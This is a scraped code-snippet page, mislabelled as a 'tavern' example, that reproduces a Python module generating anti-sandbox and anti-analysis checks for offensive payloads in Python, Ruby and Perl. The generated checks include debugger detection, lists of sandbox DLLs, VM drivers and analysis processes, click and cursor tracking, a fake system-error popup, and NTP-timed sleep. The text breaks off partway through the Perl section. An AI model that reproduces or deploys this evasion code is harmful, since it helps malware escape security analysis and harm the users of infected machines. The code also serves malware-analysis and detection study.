How to use check_code method in tavern

Best Python code snippet using tavern

gamemaker.py

Source:gamemaker.py Github

copy

Full Screen

1'''2This file contains the payload sandbox checks for each respective language3'''4from datetime import date5from datetime import timedelta6from Tools.Evasion.evasion_common import evasion_helpers7def senecas_games(evasion_payload):8 # Start checks to determine language9 # Define original values of variables10 num_tabs_required = 011 check_code = ''12 if evasion_payload.language == 'python':13 if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":14 RandToday = evasion_helpers.randomString()15 RandExpire = evasion_helpers.randomString()16 todaysdate = date.today()17 expiredate = str(todaysdate + timedelta(days=int(evasion_payload.required_options["EXPIRE_PAYLOAD"][0])))18 # Create Payload code19 check_code += '\t' * num_tabs_required + 'from datetime import datetime\n'20 check_code += '\t' * num_tabs_required + 'from datetime import date\n'21 check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'22 check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'23 check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'24 # Add a tab for this check25 num_tabs_required += 126 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":27 rand_hostname = evasion_helpers.randomString()28 check_code += '\t' * num_tabs_required + 'import platform\n'29 check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'30 check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n'31 # Add a tab for this check32 num_tabs_required += 133 if evasion_payload.required_options["DOMAIN"][0].lower() != "x":34 rand_domain = evasion_helpers.randomString()35 check_code += '\t' * num_tabs_required + 'import socket\n'36 check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'37 check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n'38 # Add a tab for this check39 num_tabs_required += 140 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":41 rand_processor_count = evasion_helpers.randomString()42 check_code += '\t' * num_tabs_required + 'import multiprocessing\n'43 check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'44 check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options["PROCESSORS"][0] + ':\n'45 # Add a tab for this check46 num_tabs_required += 147 if evasion_payload.required_options["USERNAME"][0].lower() != "x":48 rand_user_name = evasion_helpers.randomString()49 check_code += '\t' * num_tabs_required + 'import getpass\n'50 check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'51 check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n'52 # Add a tab for this check53 num_tabs_required += 154 if evasion_payload.required_options["DETECTDEBUG"][0].lower() != "false":55 is_debugger_present = evasion_helpers.randomString()56 check_code += '\t' * num_tabs_required + 'from ctypes import *\n'57 check_code += '\t' * num_tabs_required + is_debugger_present + ' = windll.kernel32.IsDebuggerPresent()\n'58 check_code += '\t' * num_tabs_required + 'if ' + is_debugger_present + ' == 0:\n'59 # Add a tab for this check60 num_tabs_required += 161 if evasion_payload.required_options["VIRTUALDLLS"][0].lower() != "false":62 evidenceof_sandbox = evasion_helpers.randomString()63 sandbox_dlls = evasion_helpers.randomString()64 all_pids = evasion_helpers.randomString()65 pid = evasion_helpers.randomString()66 hProcess = evasion_helpers.randomString()67 curProcessDLLs = evasion_helpers.randomString()68 dll = evasion_helpers.randomString()69 dll_name = evasion_helpers.randomString()70 sandbox_dll = evasion_helpers.randomString()71 check_code += '\t' * num_tabs_required + 'import win32api\n'72 check_code += '\t' * num_tabs_required + 'import win32process\n'73 check_code += '\t' * num_tabs_required + evidenceof_sandbox + '= []\n'74 # removed dbghelp.dll75 check_code += '\t' * num_tabs_required + sandbox_dlls + ' = ["sbiedll.dll","api_log.dll","dir_watch.dll","pstorec.dll","vmcheck.dll","wpespy.dll"]\n'76 check_code += '\t' * num_tabs_required + all_pids + '= win32process.EnumProcesses()\n'77 check_code += '\t' * num_tabs_required + 'for ' + pid + ' in ' + all_pids + ':\n'78 check_code += '\t' * num_tabs_required + '\ttry:\n'79 check_code += '\t' * num_tabs_required + '\t\t' + hProcess + ' = win32api.OpenProcess(0x0410, 0, ' + pid + ')\n'80 check_code += '\t' * num_tabs_required + '\t\ttry:\n'81 check_code += '\t' * num_tabs_required + '\t\t\t' + curProcessDLLs + '= win32process.EnumProcessModules(' + hProcess + ')\n'82 check_code += '\t' * num_tabs_required + '\t\t\tfor ' + dll + ' in ' + curProcessDLLs + ':\n'83 check_code += '\t' * num_tabs_required + '\t\t\t\t' + dll_name + '= str(win32process.GetModuleFileNameEx(' + hProcess + ', ' + dll + ')).lower()\n'84 check_code += '\t' * num_tabs_required + '\t\t\t\tfor ' + sandbox_dll + ' in '+ sandbox_dlls + ':\n'85 check_code += '\t' * num_tabs_required + '\t\t\t\t\tif ' + sandbox_dll + ' in ' + dll_name + ':\n'86 check_code += '\t' * num_tabs_required + '\t\t\t\t\t\tif ' + dll_name + ' not in ' + evidenceof_sandbox + ':\n'87 check_code += '\t' * num_tabs_required + '\t\t\t\t\t\t\t' + evidenceof_sandbox + '.append(' + dll_name + ')\n'88 check_code += '\t' * num_tabs_required + '\t\tfinally:\n'89 check_code += '\t' * num_tabs_required + '\t\t\twin32api.CloseHandle(' + pid + ')\n'90 check_code += '\t' * num_tabs_required + '\texcept:\n'91 check_code += '\t' * num_tabs_required + '\t\tpass\n'92 check_code += '\t' * num_tabs_required + 'if not ' + evidenceof_sandbox + ':\n'93 # Add a tab for this check94 num_tabs_required += 195 if evasion_payload.required_options["MINRAM"][0].lower() != "false":96 class_name = evasion_helpers.randomString()97 field_name = evasion_helpers.randomString()98 memory_status = evasion_helpers.randomString()99 check_code += '\t' * num_tabs_required + 'import ctypes\n'100 check_code += '\t' * num_tabs_required + 'class ' + class_name + ' (ctypes.Structure):\n'101 check_code += '\t' * num_tabs_required + '\t_fields_ = [\n'102 check_code += '\t' * num_tabs_required + '\t\t("dwLength", ctypes.c_ulong),\n'103 check_code += '\t' * num_tabs_required + '\t\t("dwMemoryLoad", ctypes.c_ulong),\n'104 check_code += '\t' * num_tabs_required + '\t\t("ullTotalPhys", ctypes.c_ulonglong),\n'105 check_code += '\t' * num_tabs_required + '\t\t("ullAvailPhys", ctypes.c_ulonglong),\n'106 check_code += '\t' * num_tabs_required + '\t\t("ullTotalPageFile", ctypes.c_ulonglong),\n'107 check_code += '\t' * num_tabs_required + '\t\t("ullAvailPageFile", ctypes.c_ulonglong),\n'108 check_code += '\t' * num_tabs_required + '\t\t("ullTotalVirtual", ctypes.c_ulonglong),\n'109 check_code += '\t' * num_tabs_required + '\t\t("ullAvailVirtual", ctypes.c_ulonglong),\n'110 check_code += '\t' * num_tabs_required + '\t\t("sullAvailExtendedVirtual", ctypes.c_ulonglong),\n'111 check_code += '\t' * num_tabs_required + '\t]\n'112 check_code += '\t' * num_tabs_required + memory_status + ' = ' + class_name + '()\n'113 check_code += '\t' * num_tabs_required + memory_status + '.dwLength = ctypes.sizeof(' + class_name + ')\n'114 check_code += '\t' * num_tabs_required + 'ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(' + memory_status + '))\n'115 check_code += '\t' * num_tabs_required + 'if ' + memory_status + '.ullTotalPhys/1073741824 > 3:\n'116 # Add a tab for this check117 num_tabs_required += 1118 if evasion_payload.required_options["CLICKTRACK"][0].lower() != "x":119 rand_counter = evasion_helpers.randomString()120 minimum_clicks = evasion_helpers.randomString()121 left_click = evasion_helpers.randomString()122 right_click = evasion_helpers.randomString()123 check_code += '\t' * num_tabs_required + 'import win32api\n'124 check_code += '\t' * num_tabs_required + rand_counter + " = 0\n"125 check_code += '\t' * num_tabs_required + minimum_clicks + " = " + evasion_payload.required_options["CLICKTRACK"][0] + "\n"126 check_code += '\t' * num_tabs_required + 'while ' + rand_counter + ' < ' + minimum_clicks + ':\n'127 check_code += '\t' * num_tabs_required + '\t' + left_click + ' = win32api.GetAsyncKeyState(1)\n'128 check_code += '\t' * num_tabs_required + '\t' + right_click + ' = win32api.GetAsyncKeyState(2)\n'129 check_code += '\t' * num_tabs_required + '\t' + 'if ' + left_click + ' % 2 == 1:\n'130 check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'131 check_code += '\t' * num_tabs_required + '\t' + 'if ' + right_click + ' % 2 == 1:\n'132 check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'133 check_code += '\t' * num_tabs_required + 'if ' + rand_counter + ' >= ' + minimum_clicks + ':\n'134 # Add a tab for this check135 num_tabs_required += 1136 if evasion_payload.required_options["VIRTUALFILES"][0].lower() != "false":137 vmfiles_exist = evasion_helpers.randomString()138 files_tocheck = evasion_helpers.randomString()139 file_path = evasion_helpers.randomString()140 check_code += '\t' * num_tabs_required + 'import os\n'141 check_code += '\t' * num_tabs_required + vmfiles_exist + ' = []\n'142 check_code += '\t' * num_tabs_required + files_tocheck + " = [r'C:\windows\Sysnative\Drivers\Vmmouse.sys', r'C:\windows\Sysnative\Drivers\vm3dgl.dll', r'C:\windows\Sysnative\Drivers\vmdum.dll', r'C:\windows\Sysnative\Drivers\vm3dver.dll', r'C:\windows\Sysnative\Drivers\vmtray.dll', r'C:\windows\Sysnative\Drivers\vmci.sys', r'C:\windows\Sysnative\Drivers\vmusbmouse.sys', r'C:\windows\Sysnative\Drivers\vmx_svga.sys', r'C:\windows\Sysnative\Drivers\vmxnet.sys', r'C:\windows\Sysnative\Drivers\VMToolsHook.dll', r'C:\windows\Sysnative\Drivers\vmhgfs.dll', r'C:\windows\Sysnative\Drivers\vmmousever.dll', r'C:\windows\Sysnative\Drivers\vmGuestLib.dll', r'C:\windows\Sysnative\Drivers\VmGuestLibJava.dll', r'C:\windows\Sysnative\Drivers\vmscsi.sys', r'C:\windows\Sysnative\Drivers\VBoxMouse.sys', r'C:\windows\Sysnative\Drivers\VBoxGuest.sys', r'C:\windows\Sysnative\Drivers\VBoxSF.sys', r'C:\windows\Sysnative\Drivers\VBoxVideo.sys', r'C:\windows\Sysnative\vboxdisp.dll', r'C:\windows\Sysnative\vboxhook.dll', r'C:\windows\Sysnative\vboxmrxnp.dll', r'C:\windows\Sysnative\vboxogl.dll', r'C:\windows\Sysnative\vboxoglarrayspu.dll', r'C:\windows\Sysnative\vboxoglcrutil.dll', r'C:\windows\Sysnative\vboxoglerrorspu.dll', r'C:\windows\Sysnative\vboxoglfeedbackspu.dll', r'C:\windows\Sysnative\vboxoglpackspu.dll', r'C:\windows\Sysnative\vboxoglpassthroughspu.dll', r'C:\windows\Sysnative\vboxservice.exe', r'C:\windows\Sysnative\vboxtray.exe', r'C:\windows\Sysnative\VBoxControl.exe']"143 check_code += '\t' * num_tabs_required + 'for ' + file_path + ' in ' + files_tocheck + ':\n'144 check_code += '\t' * num_tabs_required + '\tif os.path.isFile(' + file_path + '):\n'145 check_code += '\t' * num_tabs_required + '\t\t' + vmfiles_exist + '.append(' + file_path + ')'146 check_code += '\t' * num_tabs_required + 'if not ' + vmfiles_exist + ':\n'147 # Add a tab for this check148 num_tabs_required += 1149 if evasion_payload.required_options["CURSORMOVEMENT"][0].lower() != "false":150 seconds = evasion_helpers.randomString()151 x_position = evasion_helpers.randomString()152 y_position = evasion_helpers.randomString()153 x2_position = evasion_helpers.randomString()154 y2_position = evasion_helpers.randomString()155 check_code += '\t' * num_tabs_required + 'from time import sleep\n'156 check_code += '\t' * num_tabs_required + 'import win32api\n'157 check_code += '\t' * num_tabs_required + seconds + ' = 30\n'158 check_code += '\t' * num_tabs_required + x_position + ', ' + y_position + ' = win32api.GetCursorPos()\n'159 check_code += '\t' * num_tabs_required + 'sleep(30)\n'160 check_code += '\t' * num_tabs_required + x2_position + ', ' + y2_position + ' = win32api.GetCursorPos()\n'161 check_code += '\t' * num_tabs_required + 'if ' + x_position + ' - ' + x2_position + ' != 0 or ' + y_position + ' - ' + y2_position + ' != 0:\n'162 # Add a tab for this check163 num_tabs_required += 1164 if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":165 popup_title = evasion_helpers.randomString()166 popup_message = evasion_helpers.randomString()167 message_box = evasion_helpers.randomString()168 check_code += '\t' * num_tabs_required + 'import ctypes\n'169 check_code += '\t' * num_tabs_required + popup_title + ' = "System Error 0x18463832"\n'170 check_code += '\t' * num_tabs_required + popup_message + ' = "Your system encountered an error, please click OK to proceed"\n'171 check_code += '\t' * num_tabs_required + message_box + ' = ctypes.windll.user32.MessageBoxW\n'172 check_code += '\t' * num_tabs_required + message_box + '(None, ' + popup_message + ', ' + popup_title + ', 0)\n'173 check_code += '\t' * num_tabs_required + 'if True:\n'174 # Add a tab for this check175 num_tabs_required += 1176 if evasion_payload.required_options["SANDBOXPROCESS"][0].lower() != "false":177 sandbox_exist = evasion_helpers.randomString()178 bad_procs = evasion_helpers.randomString()179 current_processes = evasion_helpers.randomString()180 process = evasion_helpers.randomString()181 sandbox_proc = evasion_helpers.randomString()182 check_code += '\t' * num_tabs_required + 'import win32pdh\n'183 check_code += '\t' * num_tabs_required + sandbox_exist + ' = []\n'184 check_code += '\t' * num_tabs_required + bad_procs + ' = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'185 check_code += '\t' * num_tabs_required + '_, ' + current_processes + ' = win32pdh.EnumObjectItems(None,None,\'process\', win32pdh.PERF_DETAIL_WIZARD)\n'186 check_code += '\t' * num_tabs_required + 'for ' + process + ' in ' + current_processes + ':\n'187 check_code += '\t' * num_tabs_required + '\tfor ' + sandbox_proc + ' in ' + bad_procs + ':\n'188 check_code += '\t' * num_tabs_required + '\t\tif ' + sandbox_proc + ' in str(' + process + '.lower()):\n'189 check_code += '\t' * num_tabs_required + '\t\t\t' + sandbox_exist + '.append(' + process + ')\n'190 check_code += '\t' * num_tabs_required + '\t\t\tbreak\n'191 check_code += '\t' * num_tabs_required + 'if not ' + sandbox_exist + ':\n'192 # Add a tab for this check193 num_tabs_required += 1194 if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":195 time_import = evasion_helpers.randomString()196 check_code += '\t' * num_tabs_required + 'import time as ' + time_import + '\n'197 check_code += '\t' * num_tabs_required + 'if ' + time_import + '.tzname[0] != "Coordinated Universal Time" and ' + time_import + '.tzname[1] != "Coordinated Universal Time":\n'198 # Add a tab for this check199 num_tabs_required += 1200 if evasion_payload.required_options["SLEEP"][0].lower() != "x":201 rand_time_name = evasion_helpers.randomString()202 check_code += '\t' * num_tabs_required + 'from time import sleep\n'203 check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n'204 check_code += '\t' * num_tabs_required + 'import sys\n'205 check_code += '\t' * num_tabs_required + 'import datetime\n'206 check_code += '\t' * num_tabs_required + 'import time\n'207 check_code += '\t' * num_tabs_required + 'import socket\n'208 check_code += '\t' * num_tabs_required + 'import struct\n'209 check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, SOCK_DGRAM)\n'210 check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'211 check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'212 check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n'213 check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'214 check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'215 check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'216 check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n'217 # Add a tab for this check218 num_tabs_required += 1219 # Return check information220 return check_code, num_tabs_required221 elif evasion_payload.language == 'ruby':222 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":223 check_code += 'require \'socket\'\n'224 check_code += 'hostname = Socket.gethostname.downcase\n'225 check_code += 'if hostname[\"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\"]\n'226 # Add a tab for this check227 num_tabs_required += 1228 if evasion_payload.required_options["DOMAIN"][0].lower() != "x":229 check_code += 'require \'socket\'\n'230 check_code += 'domain = Socket.gethostname.downcase\n'231 check_code += 'if domain[\"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\"]\n'232 # Add a tab for this check233 num_tabs_required += 1234 if evasion_payload.required_options["USERNAME"][0].lower() != "x":235 check_code += 'name = ENV["USERNAME"].downcase\n'236 check_code += 'if name[\"' + evasion_payload.required_options["USERNAME"][0].lower() + '\"]\n'237 # Add a tab for this check238 num_tabs_required += 1239 #if evasion_payload.required_options["DISKSIZE"][0].lower() != "x":240 # check_code += "require 'win32api'\n"241 # check_code += 'minDiskSizeGB = 50\n'242 # check_code += "GetDiskFreeSpaceEx = Win32API.new(\"kernel32\", \"GetDiskFreeSpaceEx\", ['P','P','P','P'], 'I')\n"243 # check_code += 'diskSizeBytes = [0].pack("Q"); freeBytesAvail = [0].pack("Q"); totalFreeBytes = [0].pack("Q")\n'244 # check_code += 'GetDiskFreeSpaceEx.call("C:", freeBytesAvail, diskSizeBytes, totalFreeBytes)\n'245 # check_code += 'diskSizeGB = diskSizeBytes.unpack("Q").first / 1073741824.0\n'246 # check_code += 'if diskSizeGB > minDiskSizeGB'247 # Add a tab for this check248 # num_tabs_required += 1249 #if evasion_payload.required_options["NUMPROCS"][0].lower() != "x":250 # check_code += "require 'win32ole'\n"251 # check_code += 'if (WIN32OLE.connect("winmgmts://").ExecQuery("SELECT NumberOfCores FROM Win32_Processor").to_enum.first.NumberOfCores >= ' + evasion_payload.required_options["NUMPROCS"][0] + ')\n'252 # Add a tab for this check253 # num_tabs_required += 1254 #if evasion_payload.required_options["MINRAM"][0].lower() != 'x':255 #if evasion_payload.required_options["USERPROMPT"][0].lower() != "x":256 ## title_bar = evasion_helpers.randomString()257 # body_text = evasion_helpers.randomString()258 # winapi_call = evasion_helpers.randomString()259 # check_code += 'require "Win32API"\n'260 # check_code += title_bar + ' = "System Error Encountered"\n'261 # check_code += body_text + ' = "Error encountered at address 0x41d3837f. Press OK to continue"\n'262 # check_code += winapi_call + " = Win32API.new('user32', 'MessageBox',['L', 'P', 'P', 'L'],'I')\n"263 # check_code += winapi_call + '.call(0,dialogBoxMessage,dialogBoxTitle,0)\n'264 # check_code += 'if true\n'265 # Add a tab for this check266 # num_tabs_required += 1267 if evasion_payload.required_options["SLEEP"][0].lower() != "x":268 check_code += 'require \'socket\'\n'269 check_code += 'ntp_msg = (["00011011"] + Array.new(47,1)).pack("B8 C47")\n'270 check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960);sock.close\n'271 check_code += 'firstTime = Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800)\n'272 check_code += 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'273 check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960)\n'274 check_code += 'if (Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800) - firstTime >= ' + evasion_payload.required_options["SLEEP"][0] + ')\n'275 # Add a tab for this check276 num_tabs_required += 1277 # Return check information278 return check_code, num_tabs_required279 elif evasion_payload.language == 'perl':280 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":281 rand_hostname = evasion_helpers.randomString()282 check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n'283 check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n'284 check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options["HOSTNAME"][0] + ')) != -1){\n'285 # Add a tab for this check286 num_tabs_required += 1287 if evasion_payload.required_options["USERPROMPT"][0].lower() != 'x':288 flags = evasion_helpers.randomString()289 title_bar_prompt = evasion_helpers.randomString()290 message_prompt = evasion_helpers.randomString()291 msg_box = evasion_helpers.randomString()292 check_code += '\t' * num_tabs_required + 'use Win32;\n'293 check_code += '\t' * num_tabs_required + '$' + flags + ' = 0x0;\n'294 check_code += '\t' * num_tabs_required + '$' + msg_box + ' = new Win32::API ( "user32", "MessageBox", [N, P, P, I], N );\n'295 check_code += '\t' * num_tabs_required + '$' + msg_box + '->Call ( 0, "System error at 0x48d72ac3. Press OK to continue.", "System Error Encountered", $' + flags + ');'296 check_code += '\t' * num_tabs_required + 'if (1) {\n'297 # Add a tab for this check298 num_tabs_required += 1299 if evasion_payload.required_options["RAMSIZE"][0].lower() != 'x':300 wmi_cim = evasion_helpers.randomString()301 total_ram = evasion_helpers.randomString()302 subMem = evasion_helpers.randomString()303 check_code += '\t' * num_tabs_required + 'use Win32::OLE qw(EVENTS HRESULT in);\n'304 check_code += '\t' * num_tabs_required + 'my $' + wmi_cim + ' = Win32::OLE->GetObject("WINMGMTS://./root/CIMv2");\n'305 check_code += '\t' * num_tabs_required + 'my $' + total_ram + ' = 0;\n'306 check_code += '\t' * num_tabs_required + 'foreach my $' + subMem + ' (in($' + wmi_cim + '->InstancesOf("Win32_PhysicalMemory"))) {\n'307 check_code += '\t' * num_tabs_required + '\t$' + total_ram + ' += $' + subMem + '->{Capacity};\n'308 check_code += '\t' * num_tabs_required + '}\n'309 check_code += '\t' * num_tabs_required + 'if ($' + total_ram + '/1073741824 > ' + evasion_payload.required_options["RAMSIZE"][0] + ') {\n'310 # Add a tab for this check311 num_tabs_required += 1312 if evasion_payload.required_options["FILENAME"][0].lower() != 'x':313 expected_name = evasion_helpers.randomString()314 actual_name = evasion_helpers.randomString()315 check_code += '\t' * num_tabs_required + 'use File::Basename;\n'316 check_code += '\t' * num_tabs_required + 'my $' + expected_name + ' = "' + evasion_payload.required_options["FILENAME"][0].lower() + '";\n'317 check_code += '\t' * num_tabs_required + 'my $' + actual_name + ' = basename($0);\n'318 check_code += '\t' * num_tabs_required + 'if (index($' + actual_name + ', $' + expected_name + ') != -1) {\n'319 # Add a tab for this check320 num_tabs_required += 1321 if evasion_payload.required_options["NUMPROCS"][0].lower() != 'x':322 min_procs = evasion_helpers.randomString()323 wmi_var = evasion_helpers.randomString()324 total_procs = evasion_helpers.randomString()325 check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'326 check_code += '\t' * num_tabs_required + 'my $' + min_procs + ' = ' + evasion_payload.required_options["NUMPROCS"][0] + ';\n'327 check_code += '\t' * num_tabs_required + 'my $' + wmi_var + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'328 check_code += '\t' * num_tabs_required + 'my $' + total_procs + ' = $' + wmi_var + '->ExecQuery("SELECT * FROM Win32_Process")->{Count} or die;\n'329 check_code += '\t' * num_tabs_required + 'if ($' + total_procs + ' > $' + min_procs + ') {\n'330 # Add a tab for this check331 num_tabs_required += 1332 if evasion_payload.required_options["DISKSIZE"][0].lower() != 'x':333 min_disksize = evasion_helpers.randomString()334 file_object = evasion_helpers.randomString()335 real_disksize = evasion_helpers.randomString()336 check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'337 check_code += '\t' * num_tabs_required + 'my $' + min_disksize + ' = ' + evasion_payload.required_options['DISKSIZE'][0] + ';\n'338 check_code += '\t' * num_tabs_required + 'my $' + file_object + ' = Win32::OLE->CreateObject("Scripting.FileSystemObject");\n'339 check_code += '\t' * num_tabs_required + 'my $' + real_disksize + ' = $' + file_object + '->GetDrive("C:")->{TotalSize}/1073741824.0;\n'340 check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' < $' + real_disksize + ') {\n'341 # Add a tab for this check342 num_tabs_required += 1343 if evasion_payload.required_options["NUMCLICKS"][0].lower() != 'x':344 perl_min_clicks = evasion_helpers.randomString()345 perl_key_state = evasion_helpers.randomString()346 click_count = evasion_helpers.randomString()347 perl_leftclick = evasion_helpers.randomString()348 perl_rightclick = evasion_helpers.randomString()349 check_code += '\t' * num_tabs_required + 'my $' + perl_min_clicks + ' = ' + evasion_payload.required_options["NUMCLICKS"][0] + ';\n'350 check_code += '\t' * num_tabs_required + 'my $' + perl_key_state + ' = new Win32::API("user32", "GetAsyncKeyState", +"I", "N");\n'351 check_code += '\t' * num_tabs_required + 'my $' + click_count + ' = 0;\n'352 check_code += '\t' * num_tabs_required + 'while ($' + click_count + ' < $' + perl_min_clicks + ') {\n'353 check_code += '\t' * num_tabs_required + '\tmy $' + perl_leftclick + ' = $' + perl_key_state + '->Call(1);\n'354 check_code += '\t' * num_tabs_required + '\tmy $' + perl_rightclick + ' = $' + perl_key_state + '->Call(2);\n'355 check_code += '\t' * num_tabs_required + '\tif ($' + perl_leftclick + ') {\n'356 check_code += '\t' * num_tabs_required + '\t\t++$' + click_count + ';\n'357 check_code += '\t' * num_tabs_required + '\t}\n'358 check_code += '\t' * num_tabs_required + '\tif ($' + perl_rightclick + ') {\n'359 check_code += '\t' * num_tabs_required + '\t\t++$' + click_count + ';\n'360 check_code += '\t' * num_tabs_required + '\t}\n'361 check_code += '\t' * num_tabs_required + '\tsleep(2);\n'362 check_code += '\t' * num_tabs_required + '}\n'363 check_code += '\t' * num_tabs_required + 'if (1) {\n'364 # Add a tab for this check365 num_tabs_required += 1366 if evasion_payload.required_options["REGSIZE"][0].lower() != 'x':367 reg_mb_size = evasion_helpers.randomString()368 perl_wmi = evasion_helpers.randomString()369 reg_dump = evasion_helpers.randomString()370 reg_size = evasion_helpers.randomString()371 perl_reg_obj = evasion_helpers.randomString()372 check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'373 check_code += '\t' * num_tabs_required + 'my $' + reg_mb_size + ' = ' + evasion_payload.required_options["REGSIZE"][0] + ';\n'374 check_code += '\t' * num_tabs_required + 'my $' + perl_wmi + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'375 check_code += '\t' * num_tabs_required + 'my $' + reg_dump + ' = $' + perl_wmi + '->ExecQuery("SELECT CurrentSize from Win32_Registry") or die;\n'376 check_code += '\t' * num_tabs_required + 'my $' + reg_size + ';\n'377 check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $' + perl_reg_obj + '->CurrentSize; }\n'378 check_code += '\t' * num_tabs_required + 'if ($' + reg_size + ' > $' + reg_mb_size + ') {\n'379 # Add a tab for this check380 num_tabs_required += 1381 if evasion_payload.required_options["USERNAME"][0].lower() != "x":382 rand_name = evasion_helpers.randomString()383 check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n'384 check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options["USERNAME"][0] + '\")) != -1){\n'385 # Add a tab for this check386 num_tabs_required += 1387 if evasion_payload.required_options["DOMAIN"][0].lower() != "x":388 rand_domain = evasion_helpers.randomString()389 check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n'390 check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n'391 check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options["DOMAIN"][0] + '\")) != -1){\n'392 # Add a tab for this check393 num_tabs_required += 1394 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":395 rand_corecount = evasion_helpers.randomString()396 check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};'397 check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + ' >= '+ evasion_payload.required_options["PROCESSORS"][0] + '){\n'398 # Add a tab for this check399 num_tabs_required += 1400 if evasion_payload.required_options["SLEEP"][0].lower() != "x":401 check_code += '\t' * num_tabs_required + 'use IO::Socket;'402 check_code += '\t' * num_tabs_required + 'my $firstTime;my $secondTime;my $sock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'403 check_code += '\t' * num_tabs_required + 'my $NTPTransmit = pack("B384", "00100011", (0)x14);my $secondTransmit = pack("B384", "00100011", (0)x14);\n'404 check_code += '\t' * num_tabs_required + '$sock->send($NTPTransmit);$sock->recv($NTPTransmit, 384);my ($Ignore, $firstTime, $Ignore2)=unpack("B319 N B32",$NTPTransmit);$firstTime -= 2208988800;$sock->close;\n'405 check_code += '\t' * num_tabs_required + 'sleep ' + evasion_payload.required_options["SLEEP"][0] + ';\n'406 check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'407 check_code += '\t' * num_tabs_required + '$newSock->send($secondTransmit);$newSock->recv($secondTransmit, 384);my ($Ignore, $secondTime, $Ignore2)=unpack("B319 N B32",$secondTransmit);$newSock->close;\n'408 check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'409 check_code += 